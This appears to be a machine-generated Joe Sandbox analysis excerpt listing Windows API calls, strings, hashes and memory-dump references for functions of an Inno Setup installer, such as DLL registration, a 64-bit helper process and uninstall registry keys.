                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1968650500-2910565190
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c853e2fff55d65e8d129e85ff78f3f369b1d987d424fcfc4da802376ce12adb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c853e2fff55d65e8d129e85ff78f3f369b1d987d424fcfc4da802376ce12adb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                                                                                                                                                                                                                                                                                                                  • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FindSleepWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3078808852-3310373309
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d7dc25f5351ce0c3cf552ae760edf39d4f9b9a96261b56e9e1545ea6af5b7163
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7dc25f5351ce0c3cf552ae760edf39d4f9b9a96261b56e9e1545ea6af5b7163
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                                                                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                                                                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4012871263-351310198
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eb8db78fecf0c55d76ee5f629d1abcc1bb306bcc403d3524b76b077b64b0abe0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb8db78fecf0c55d76ee5f629d1abcc1bb306bcc403d3524b76b077b64b0abe0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00458993
                                                                                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(02123858,00000000,00458C26,?,?,02123858,00000000,?,00459322,?,02123858,00000000), ref: 0045899C
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(02123858,02123858), ref: 004589A6
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,02123858,00000000,00458C26,?,?,02123858,00000000,?,00459322,?,02123858,00000000), ref: 004589AF
                                                                                                                                                                                                                                                                                                                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02123858,02123858), ref: 00458A33
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                                                                                                                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 770386003-3271284199
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70e38dd447138bcefc713db898d614ae7d4513f4e48320b4567d3bd45fcb569e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70e38dd447138bcefc713db898d614ae7d4513f4e48320b4567d3bd45fcb569e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                                                                                                                                                                                                                                                                                                  • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                                                                                                                                                                                                                                                                                                  • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1952589944-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmStartSession), ref: 004502F5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmRegisterResources), ref: 0045030A
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmGetList), ref: 0045031F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmShutdown), ref: 00450334
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmRestart), ref: 00450349
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RmEndSession), ref: 0045035E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1968650500-3419246398
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7cc48a0367f981266fd0da5a480c29d0f3082de0c95511ddd32f2e75d41d9e32
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc48a0367f981266fd0da5a480c29d0f3082de0c95511ddd32f2e75d41d9e32
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Icon Group, xrefs: 004691D2
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: No Icons, xrefs: 004691DF
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Deselected Components, xrefs: 00469238
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                                                                                                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00469171
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: App Path, xrefs: 004691B6
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Setup Type, xrefs: 00469206
                                                                                                                                                                                                                                                                                                                                                                  • Inno Setup: Selected Components, xrefs: 00469216
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1093091907
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39aaf2710b8dcc9925ef1b8acf94251e60f4389a4c1716d00ca03a8503c3ae03
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39aaf2710b8dcc9925ef1b8acf94251e60f4389a4c1716d00ca03a8503c3ae03
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                                                                                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
